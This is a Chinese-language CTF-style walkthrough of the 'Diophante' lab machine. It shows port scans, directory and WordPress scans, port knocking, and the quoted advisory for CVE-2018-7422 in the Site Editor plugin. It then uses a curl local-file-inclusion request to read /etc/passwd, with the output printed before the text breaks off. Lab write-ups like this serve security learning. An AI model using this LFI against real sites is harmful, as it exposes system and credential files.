![\"image-20250613212916590\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506141116105.png\")
<\/div>\n
![\"image-20250614091814914\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506141116107.png\")
<\/div><\/p>\n\u4fe1\u606f\u641c\u96c6<\/h2>\n\u7aef\u53e3\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Diophante]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---. .----. .---. .--. .-. .-.\n| {} }| { } |{ {__ {_ _}{ {__ \/ ___} \/ {} \\ | `| |\n| .-. \\| {_} |.-._} } | | .-._} }\\ }\/ \/\\ \\| |\\ |\n`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: http:\/\/discord.skerritt.blog :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nI scanned my computer so many times, it thinks we're dating.\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.10.107:22\nOpen 192.168.10.107:25\nOpen 192.168.10.107:80\n\nPORT STATE SERVICE REASON VERSION\n22\/tcp open ssh syn-ack ttl 64 OpenSSH 8.4p1 Debian 5 (protocol 2.0)\n| ssh-hostkey: \n| 2048 34:55:b2:c3:59:4e:b1:e5:dc:47:bb:73:f6:df:de:43 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC31MDow8cn4PkHzTyr6hHNjHWNqArCM26Eel8Tl1DxnZX56uuHi893mc\/+VVo75DqHnfU6etdZhCPeZ+5O3AS6iinLDT7vSlPd013+SHDU3gFHtvz76fLejnlnen4N7Vf37jYcfdF1EG9C7k017gDQc9Cby4\/QwGpXyrYAcLxmhO0odPDBQyULO\/gzzTkfyCJROF\/+vrr2AcX\/K4i9Sa9sE31FzDo1N\/bh0GOhlika1gB8KbBtcBDqWr0UpZIcbnQZZWQRCI9JpxRNhO3azk9kkh7gyJ\/Ul3rniU\/BgX1oQhJqVDACuMDlHDTud43MStiuOnC3OaTQqkrGAVAfwBOl\n| 256 5a:c3:b8:80:53:27:8f:b4:ef:27:89:c8:e5:a6:1f:81 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCok8Zb2Hn7EFxIGAbamuVBZEtn\/ZdRpDwrIRWK8pWua+Mcn69g9Ddrd7CC87isXqcfV2St0XtBstpKi+Pg9LvY=\n| 256 08:46:e6:ba:d3:64:31:88:e7:d3:66:94:ce:52:80:35 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIG1XyCckVuVysYcnoiHoHkcDpY1TOfwJ3V+Gh9yGbUXR\n25\/tcp open smtp syn-ack ttl 64 Postfix smtpd\n| ssl-cert: Subject: commonName=debian\n| Subject Alternative Name: DNS:debian\n| Issuer: commonName=debian\n| Public Key type: rsa\n| Public Key bits: 2048\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 2021-04-07T07:11:28\n| Not valid after: 2031-04-05T07:11:28\n| MD5: 57e2:69bb:8411:97da:6ae7:23ec:682c:e1d7\n| SHA-1: e8cd:3c39:4301:4e53:99b6:ba02:3fea:04bd:a48b:0f66\n| -----BEGIN CERTIFICATE-----\n| MIIC0DCCAbigAwIBAgIUWq6t5x5ifQADHbAT1jP8zFP1HDAwDQYJKoZIhvcNAQEL\n| BQAwETEPMA0GA1UEAwwGZGViaWFuMB4XDTIxMDQwNzA3MTEyOFoXDTMxMDQwNTA3\n| MTEyOFowETEPMA0GA1UEAwwGZGViaWFuMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8A\n| MIIBCgKCAQEArs5OM6mhTflVnLKiwC08GRsXSQidMlmFDJGECVtfwhdWJZlAaYju\n| u8g25w+1shV5jxa47PnSsfp7Jr2urVsPl1iAiqqrSC84nbrzhP5LpPD4wzFuOGak\n| 0U77Yb9mv1fX1AZNoEm4S5GTFvOMb2cfIbVbUFgX3vREMOAQUTyjX4+Bxns4\/1M\/\n| 9sZweDdAUrgHscJu8o2v2tRTeW6wSQAbiRer0C9oExqOQHYaZzbaFwnEPyzCHdgO\n| 6zzIhGeX8xNcjE3YdjbW3+eVvE8QOEfScQoc0K1HFpUXtY2OsLGrUTkiGcFqV6zA\n| tVhP74FDfPyNue\/1bIhkogK7PbJT3ONgQwIDAQABoyAwHjAJBgNVHRMEAjAAMBEG\n| A1UdEQQKMAiCBmRlYmlhbjANBgkqhkiG9w0BAQsFAAOCAQEAMdm+7kAojV0ZLAGD\n| +a+tWQ8OiauOFfjUK9IGljJbKc0xujYWq6glJJHI4h2QF6CjxOBL5mPV5qt4JYvZ\n| yFWJvzWvjy0pDwgsm8OHL8sJydZrqBw1QjLWYnPHhpeKbiZO9W9mYkTC7r8aNreW\n| z7yF\/l7diFs8csEFvKnG9C3JtRgFo0C1baWn5GraecBut9E6QCdz0Ad\/Gqu30cEY\n| 6ArLC+jHkX4phDH0V5\/FJov0kctTdIlu0Oj+ItfvOel5ifn3tLIBEVmutvuHim6x\n| vrkdNkjdLmjgdKjm8y+vWHDDKn+Z\/sEHp8AXqJj7ynf3mE6RrQgTJLFG4R0R84n7\n| 9bqenw==\n|_-----END CERTIFICATE-----\n|_smtp-commands: debian, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING\n|_ssl-date: TLS randomness does not represent time\n80\/tcp open http syn-ack ttl 64 Apache httpd 2.4.38 ((Debian))\n| http-methods: \n|_ Supported Methods: HEAD OPTIONS\n|_http-title: Apache2 Debian Default Page: It works\nMAC Address: 08:00:27:7B:4E:08 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: Host: debian; OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Diophante]\n\u2514\u2500$ feroxbuster -u http:\/\/$IP\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x html txt php -s 200 301 302 -d 22>\/dev\/null\n\n ___ ___ __ __ __ __ __ ___\n|__ |__ |__) |__) | \/ ` \/ \\ \\_\/ | | \\ |__\n| |___ | \\ | \\ | \\__, \\__\/ \/ \\ | |__\/ |___\nby Ben "epi" Risher \ud83e\udd13 ver: 2.11.0\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n \ud83c\udfaf Target Url \u2502 http:\/\/192.168.10.107\/\n \ud83d\ude80 Threads \u2502 50\n \ud83d\udcd6 Wordlist \u2502 \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n \ud83d\udc4c Status Codes \u2502 [200, 301, 302]\n \ud83d\udca5 Timeout (secs) \u2502 7\n \ud83e\udda1 User-Agent \u2502 feroxbuster\/2.11.0\n \ud83d\udc89 Config File \u2502 \/etc\/feroxbuster\/ferox-config.toml\n \ud83d\udd0e Extract Links \u2502 true\n \ud83d\udcb2 Extensions \u2502 [html, txt, php]\n \ud83c\udfc1 HTTP methods \u2502 [GET]\n \ud83d\udd03 Recursion Depth \u2502 22\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n \ud83c\udfc1 Press [ENTER] to use the Scan Management Menu\u2122\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n^C \n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Diophante]\n\u2514\u2500$ feroxbuster -u http:\/\/$IP\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x html txt php -s 200 301 302 -d 2 2>\/dev\/null\n\n301 GET 9l 28w 315c http:\/\/192.168.10.107\/blog => http:\/\/192.168.10.107\/blog\/\n200 GET 368l 933w 10701c http:\/\/192.168.10.107\/index.html\n200 GET 24l 126w 10356c http:\/\/192.168.10.107\/icons\/openlogo-75.png\n200 GET 368l 933w 10701c http:\/\/192.168.10.107\/\n301 GET 9l 28w 326c http:\/\/192.168.10.107\/blog\/wp-content => http:\/\/192.168.10.107\/blog\/wp-content\/\n200 GET 104l 522w 8227c http:\/\/192.168.10.107\/blog\/wp-login.php\n200 GET 384l 3177w 19915c http:\/\/192.168.10.107\/blog\/license.txt\n301 GET 9l 28w 327c http:\/\/192.168.10.107\/blog\/wp-includes => http:\/\/192.168.10.107\/blog\/wp-includes\/\n301 GET 0l 0w 0c http:\/\/192.168.10.107\/blog\/index.php => http:\/\/192.168.10.107\/blog\/\n200 GET 379l 746w 5972c http:\/\/192.168.10.107\/blog\/wp-admin\/css\/install.css\n200 GET 13l 78w 4373c http:\/\/192.168.10.107\/blog\/wp-admin\/images\/wordpress-logo.png\n302 GET 0l 0w 0c http:\/\/192.168.10.107\/blog\/wp-admin\/update-core.php => http:\/\/hard\/blog\/wp-login.php?redirect_to=http%3A%2F%2F192.168.10.107%2Fblog%2Fwp-admin%2Fupdate-core.php&reauth=1\n302 GET 0l 0w 0c http:\/\/192.168.10.107\/blog\/wp-admin\/import.php => http:\/\/hard\/blog\/wp-login.php?redirect_to=http%3A%2F%2F192.168.10.107%2Fblog%2Fwp-admin%2Fimport.php&reauth=1\n200 GET 17l 88w 1287c http:\/\/192.168.10.107\/blog\/wp-admin\/install.php\n200 GET 23l 86w 1248c http:\/\/192.168.10.107\/blog\/wp-admin\/upgrade.php\n302 GET 0l 0w 0c http:\/\/192.168.10.107\/blog\/wp-admin\/ => http:\/\/hard\/blog\/wp-login.php?redirect_to=http%3A%2F%2F192.168.10.107%2Fblog%2Fwp-admin%2F&reauth=1\n200 GET 99l 1009w 8852c http:\/\/192.168.10.107\/blog\/readme.html\n200 GET 3l 6w 36c http:\/\/192.168.10.107\/note.txt\n200 GET 5l 15w 165c http:\/\/192.168.10.107\/blog\/wp-trackback.php\n301 GET 9l 28w 324c http:\/\/192.168.10.107\/blog\/wp-admin => http:\/\/192.168.10.107\/blog\/wp-admin\/\n302 GET 0l 0w 0c http:\/\/192.168.10.107\/blog\/wp-signup.php => http:\/\/hard\/blog\/wp-login.php?action=register<\/code><\/pre>\nwpscan\u626b\u63cf<\/h3>\n
\u76ee\u5f55\u626b\u63cf\u7c97\u7565\u53d1\u73b0\u662f\u4e00\u4e2awordpress<\/code><\/p>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Diophante]\n\u2514\u2500$ wpscan --url http:\/\/$IP\/blog --api-token xxxxxxxxxxxxxxx\n_______________________________________________________________\n __ _______ _____\n \\ \\ \/ \/ __ \\ \/ ____|\n \\ \\ \/\\ \/ \/| |__) | (___ ___ __ _ _ __ \u00ae\n \\ \\\/ \\\/ \/ | ___\/ \\___ \\ \/ __|\/ _` | '_ \\\n \\ \/\\ \/ | | ____) | (__| (_| | | | |\n \\\/ \\\/ |_| |_____\/ \\___|\\__,_|_| |_|\n\n WordPress Security Scanner by the WPScan Team\n Version 3.8.28\n Sponsored by Automattic - https:\/\/automattic.com\/\n @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart\n_______________________________________________________________\n\n[+] URL: http:\/\/192.168.10.107\/blog\/ [192.168.10.107]\n[+] Started: Fri Jun 13 21:31:19 2025\n\nInteresting Finding(s):\n\n[+] Headers\n | Interesting Entry: Server: Apache\/2.4.38 (Debian)\n | Found By: Headers (Passive Detection)\n | Confidence: 100%\n\n[+] XML-RPC seems to be enabled: http:\/\/192.168.10.107\/blog\/xmlrpc.php\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n | References:\n | - http:\/\/codex.wordpress.org\/XML-RPC_Pingback_API\n | - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_ghost_scanner\/\n | - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/dos\/http\/wordpress_xmlrpc_dos\/\n | - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_xmlrpc_login\/\n | - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_pingback_access\/\n\n[+] WordPress readme found: http:\/\/192.168.10.107\/blog\/readme.html\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n\n[+] Upload directory has listing enabled: http:\/\/192.168.10.107\/blog\/wp-content\/uploads\/\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n\n[+] The external WP-Cron seems to be enabled: http:\/\/192.168.10.107\/blog\/wp-cron.php\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 60%\n | References:\n | - https:\/\/www.iplocation.net\/defend-wordpress-from-ddos\n | - https:\/\/github.com\/wpscanteam\/wpscan\/issues\/1299\n\n[+] WordPress version 5.7 identified (Insecure, released on 2021-03-09).\n | Found By: Emoji Settings (Passive Detection)\n | - http:\/\/192.168.10.107\/blog\/, Match: 'wp-includes\\\/js\\\/wp-emoji-release.min.js?ver=5.7'\n | Confirmed By: Meta Generator (Passive Detection)\n | - http:\/\/192.168.10.107\/blog\/, Match: 'WordPress 5.7'\n |\n | [!] 44 vulnerabilities identified:\n |\n | [!] Title: WordPress 5.6-5.7 - Authenticated XXE Within the Media Library Affecting PHP 8\n | Fixed in: 5.7.1\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/cbbe6c17-b24e-4be4-8937-c78472a138b5\n | - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2021-29447\n | - https:\/\/wordpress.org\/news\/2021\/04\/wordpress-5-7-1-security-and-maintenance-release\/\n | - https:\/\/core.trac.wordpress.org\/changeset\/29378\n | - https:\/\/blog.wpscan.com\/2021\/04\/15\/wordpress-571-security-vulnerability-release.html\n | - https:\/\/github.com\/WordPress\/wordpress-develop\/security\/advisories\/GHSA-rv47-pc52-qrhh\n | - https:\/\/blog.sonarsource.com\/wordpress-xxe-security-vulnerability\/\n | - https:\/\/hackerone.com\/reports\/1095645\n | - https:\/\/www.youtube.com\/watch?v=3NBxcmqCgt4\n ---------------------\n | [!] Title: WordPress < 6.5.5 - Contributor+ Stored XSS in Template-Part Block\n | Fixed in: 5.7.12\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/7c448f6d-4531-4757-bff0-be9e3220bbbb\n | - https:\/\/wordpress.org\/news\/2024\/06\/wordpress-6-5-5\/\n |\n | [!] Title: WordPress < 6.5.5 - Contributor+ Path Traversal in Template-Part Block\n | Fixed in: 5.7.12\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/36232787-754a-4234-83d6-6ded5e80251c\n | - https:\/\/wordpress.org\/news\/2024\/06\/wordpress-6-5-5\/\n\n[i] The main theme could not be detected.\n\n[+] Enumerating All Plugins (via Passive Methods)\n\n[i] No plugins Found.\n\n[+] Enumerating Config Backups (via Passive and Aggressive Methods)\n Checking Config Backups - Time: 00:00:00 <==============================================================================================================> (137 \/ 137) 100.00% Time: 00:00:00\n[i] No Config Backups Found.\n\n[+] WPScan DB API OK\n | Plan: free\n | Requests Done (during the scan): 1\n | Requests Remaining: 24\n\n[+] Finished: Fri Jun 13 21:31:29 2025\n[+] Requests Done: 142\n[+] Cached Requests: 29\n[+] Data Sent: 37.18 KB\n[+] Data Received: 46.259 KB\n[+] Memory used: 237.539 MB\n[+] Elapsed time: 00:00:09<\/code><\/pre>\n\u7136\u540e\u68c0\u7d22\u4e86\u4e00\u4e0b\u7528\u6237\uff1a<\/p>\n
[i] User(s) Identified:\n\n[+] sabine\n | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)<\/code><\/pre>\n\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u8e29\u70b9<\/h3>\n
\u767b\u5f55\u9875\u9762\u662f\u4e00\u4e2a\u9ed8\u8ba4\u7684\u767b\u5f55\u9875\u9762Apache2 Debian Default Page<\/code>\uff0c\u770b\u6765\u4e1c\u897f\u4e0d\u5728\u8fd9\u3002\u3002\u3002\u3002<\/p>\n![\"image-20250614093635581\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div><\/p>\nknock<\/h3>\n
\u76ee\u5f55\u53d1\u73b0\u4e00\u5904\u63d0\u793a\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Diophante]\n\u2514\u2500$ curl -s http:\/\/192.168.10.107\/note.txt\nDon't forget: 7000 8000 9000\n\nadmin<\/code><\/pre>\nknock \u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Diophante]\n\u2514\u2500$ knock 7000 8000 9000\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Diophante]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n\nOpen 192.168.10.107:22\nOpen 192.168.10.107:25\nOpen 192.168.10.107:80\n\nPORT STATE SERVICE REASON VERSION\n22\/tcp open ssh syn-ack ttl 64 OpenSSH 8.4p1 Debian 5 (protocol 2.0)\n| ssh-hostkey: \n| 2048 34:55:b2:c3:59:4e:b1:e5:dc:47:bb:73:f6:df:de:43 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC31MDow8cn4PkHzTyr6hHNjHWNqArCM26Eel8Tl1DxnZX56uuHi893mc\/+VVo75DqHnfU6etdZhCPeZ+5O3AS6iinLDT7vSlPd013+SHDU3gFHtvz76fLejnlnen4N7Vf37jYcfdF1EG9C7k017gDQc9Cby4\/QwGpXyrYAcLxmhO0odPDBQyULO\/gzzTkfyCJROF\/+vrr2AcX\/K4i9Sa9sE31FzDo1N\/bh0GOhlika1gB8KbBtcBDqWr0UpZIcbnQZZWQRCI9JpxRNhO3azk9kkh7gyJ\/Ul3rniU\/BgX1oQhJqVDACuMDlHDTud43MStiuOnC3OaTQqkrGAVAfwBOl\n| 256 5a:c3:b8:80:53:27:8f:b4:ef:27:89:c8:e5:a6:1f:81 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCok8Zb2Hn7EFxIGAbamuVBZEtn\/ZdRpDwrIRWK8pWua+Mcn69g9Ddrd7CC87isXqcfV2St0XtBstpKi+Pg9LvY=\n| 256 08:46:e6:ba:d3:64:31:88:e7:d3:66:94:ce:52:80:35 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIG1XyCckVuVysYcnoiHoHkcDpY1TOfwJ3V+Gh9yGbUXR\n25\/tcp open smtp syn-ack ttl 64 Postfix smtpd\n| ssl-cert: Subject: commonName=debian\n| Subject Alternative Name: DNS:debian\n| Issuer: commonName=debian\n| Public Key type: rsa\n| Public Key bits: 2048\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 2021-04-07T07:11:28\n| Not valid after: 2031-04-05T07:11:28\n| MD5: 57e2:69bb:8411:97da:6ae7:23ec:682c:e1d7\n| SHA-1: e8cd:3c39:4301:4e53:99b6:ba02:3fea:04bd:a48b:0f66\n| -----BEGIN CERTIFICATE-----\n| MIIC0DCCAbigAwIBAgIUWq6t5x5ifQADHbAT1jP8zFP1HDAwDQYJKoZIhvcNAQEL\n| BQAwETEPMA0GA1UEAwwGZGViaWFuMB4XDTIxMDQwNzA3MTEyOFoXDTMxMDQwNTA3\n| MTEyOFowETEPMA0GA1UEAwwGZGViaWFuMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8A\n| MIIBCgKCAQEArs5OM6mhTflVnLKiwC08GRsXSQidMlmFDJGECVtfwhdWJZlAaYju\n| u8g25w+1shV5jxa47PnSsfp7Jr2urVsPl1iAiqqrSC84nbrzhP5LpPD4wzFuOGak\n| 0U77Yb9mv1fX1AZNoEm4S5GTFvOMb2cfIbVbUFgX3vREMOAQUTyjX4+Bxns4\/1M\/\n| 9sZweDdAUrgHscJu8o2v2tRTeW6wSQAbiRer0C9oExqOQHYaZzbaFwnEPyzCHdgO\n| 6zzIhGeX8xNcjE3YdjbW3+eVvE8QOEfScQoc0K1HFpUXtY2OsLGrUTkiGcFqV6zA\n| tVhP74FDfPyNue\/1bIhkogK7PbJT3ONgQwIDAQABoyAwHjAJBgNVHRMEAjAAMBEG\n| A1UdEQQKMAiCBmRlYmlhbjANBgkqhkiG9w0BAQsFAAOCAQEAMdm+7kAojV0ZLAGD\n| +a+tWQ8OiauOFfjUK9IGljJbKc0xujYWq6glJJHI4h2QF6CjxOBL5mPV5qt4JYvZ\n| yFWJvzWvjy0pDwgsm8OHL8sJydZrqBw1QjLWYnPHhpeKbiZO9W9mYkTC7r8aNreW\n| z7yF\/l7diFs8csEFvKnG9C3JtRgFo0C1baWn5GraecBut9E6QCdz0Ad\/Gqu30cEY\n| 6ArLC+jHkX4phDH0V5\/FJov0kctTdIlu0Oj+ItfvOel5ifn3tLIBEVmutvuHim6x\n| vrkdNkjdLmjgdKjm8y+vWHDDKn+Z\/sEHp8AXqJj7ynf3mE6RrQgTJLFG4R0R84n7\n| 9bqenw==\n|_-----END CERTIFICATE-----\n|_smtp-commands: debian, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING\n|_ssl-date: TLS randomness does not represent time\n80\/tcp open http syn-ack ttl 64 Apache httpd 2.4.38 ((Debian))\n| http-methods: \n|_ Supported Methods: HEAD GET POST OPTIONS\n|_http-server-header: Apache\/2.4.38 (Debian)\n|_http-title: Apache2 Debian Default Page: It works\nMAC Address: 08:00:27:7B:4E:08 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: Host: debian; OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n25<\/code>\u7aef\u53e3\u5f00\u653e\u4e86\uff01<\/p>\n\u63d2\u4ef6\u6f0f\u6d1e=>LFI<\/h3>\n
\u68c0\u7d22\u4e00\u4e0b\u662f\u5426\u5b58\u5728\u6f0f\u6d1e\uff0c\u68c0\u7d22\u4e00\u4e0b\u63d2\u4ef6\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Diophante]\n\u2514\u2500$ cmseek -u $IP\/blog\n\n___ _ _ ____ ____ ____ _ _\n| |\\\/| [__ |___ |___ |_\/ by @r3dhax0r\n|___ | | ___| |___ |___ | \\_ Version 1.1.3 K-RONA\n\n [+] Deep Scan Results [+] \n\n \u250f\u2501Target: 192.168.10.107\n \u2503\n \u2520\u2500\u2500 CMS: WordPress\n \u2503 \u2502\n \u2503 \u251c\u2500\u2500 Version: 5.7\n \u2503 \u2570\u2500\u2500 URL: https:\/\/wordpress.org\n \u2503\n \u2520\u2500\u2500[WordPress Deepscan]\n \u2503 \u2502\n \u2503 \u251c\u2500\u2500 License file: http:\/\/192.168.10.107\/blog\/license.txt\n \u2503 \u2502\n \u2503 \u251c\u2500\u2500 Plugins Enumerated: 1\n \u2503 \u2502 \u2502\n \u2503 \u2502 \u2570\u2500\u2500 Plugin: site-editor\n \u2503 \u2502 \u2502\n \u2503 \u2502 \u251c\u2500\u2500 Version: 4.3\n \u2503 \u2502 \u2570\u2500\u2500 URL: http:\/\/192.168.10.107\/blog\/wp-content\/plugins\/site-editor\n \u2503 \u2502\n \u2503 \u2502\n \u2503 \u251c\u2500\u2500 Themes Enumerated: 1\n \u2503 \u2502 \u2502\n \u2503 \u2502 \u2570\u2500\u2500 Theme: twentynineteen\n \u2503 \u2502 \u2502\n \u2503 \u2502 \u251c\u2500\u2500 Version: 2.0\n \u2503 \u2502 \u2570\u2500\u2500 URL: http:\/\/192.168.10.107\/blog\/wp-content\/themes\/twentynineteen\n \u2503 \u2502\n \u2503\n \u2520\u2500\u2500 Result: \/home\/kali\/temp\/Diophante\/Result\/192.168.10.107_blog\/cms.json\n \u2503\n \u2517\u2501Scan Completed in 1.71 Seconds, using 45 Requests\n\n CMSeeK says ~ Annyeong<\/code><\/pre>\n\u53d1\u73b0\u4e00\u5904\u63d2\u4ef6\uff0c\u770b\u4e00\u4e0b\u6709\u65e0\u76f8\u5173\u6f0f\u6d1e\uff1a<\/p>\n
<\/div><\/p>\n\u770b\u4e00\u4e0b\u5982\u4f55\u5229\u7528\u7684\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Diophante]\n\u2514\u2500$ cat 44340.txt \nProduct: Site Editor WordPress Plugin - https:\/\/wordpress.org\/plugins\/site-editor\/\nVendor: Site Editor\nTested version: 1.1.1\nCVE ID: CVE-2018-7422\n\n** CVE description **\nA Local File Inclusion vulnerability in the Site Editor plugin through 1.1.1 for WordPress allows remote attackers to retrieve arbitrary files via the ajax_path parameter to editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php.\n\n** Technical details **\nIn site-editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php:5, the value of the ajax_path parameter is used for including a file with PHP\u2019s require_once(). This parameter can be controlled by an attacker and is not properly sanitized.\n\nVulnerable code:\nif( isset( $_REQUEST['ajax_path'] ) && is_file( $_REQUEST['ajax_path'] ) && file_exists( $_REQUEST['ajax_path'] ) ){\n require_once $_REQUEST['ajax_path'];\n}\n\nhttps:\/\/plugins.trac.wordpress.org\/browser\/site-editor\/trunk\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?rev=1640500#L5\n\nBy providing a specially crafted path to the vulnerable parameter, a remote attacker can retrieve the contents of sensitive files on the local system.\n\n** Proof of Concept **\nhttp:\/\/<host>\/wp-content\/plugins\/site-editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=\/etc\/passwd\n\n** Solution **\nNo fix available yet.\n\n** Timeline **\n03\/01\/2018: author contacted through siteeditor.org's contact form; no reply\n16\/01\/2018: issue report filled on the public GitHub page with no technical details\n18\/01\/2018: author replies and said he replied to our e-mail 8 days ago (could not find the aforementioned e-mail at all); author sends us "another" e-mail\n19\/01\/2018: report sent; author says he will fix this issue "very soon"\n31\/01\/2018: vendor contacted to ask about an approximate release date and if he needs us to postpone the disclosure; no reply\n14\/02\/2018: WP Plugins team contacted; no reply\n06\/03\/2018: vendor contacted; no reply\n07\/03\/2018: vendor contacted; no reply\n15\/03\/2018: public disclosure\n\n** Credits **\nVulnerability discovered by Nicolas Buzy-Debat working at Orange Cyberdefense Singapore (CERT-LEXSI).\n\n--\nBest Regards,\n\nNicolas Buzy-Debat\nOrange Cyberdefense Singapore (CERT-LEXSI)<\/code><\/pre>\n\u5c1d\u8bd5\u5229\u7528\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Diophante]\n\u2514\u2500$ curl "http:\/\/192.168.10.107\/blog\/wp-content\/plugins\/site-editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=\/etc\/passwd" --output -\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/var\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System 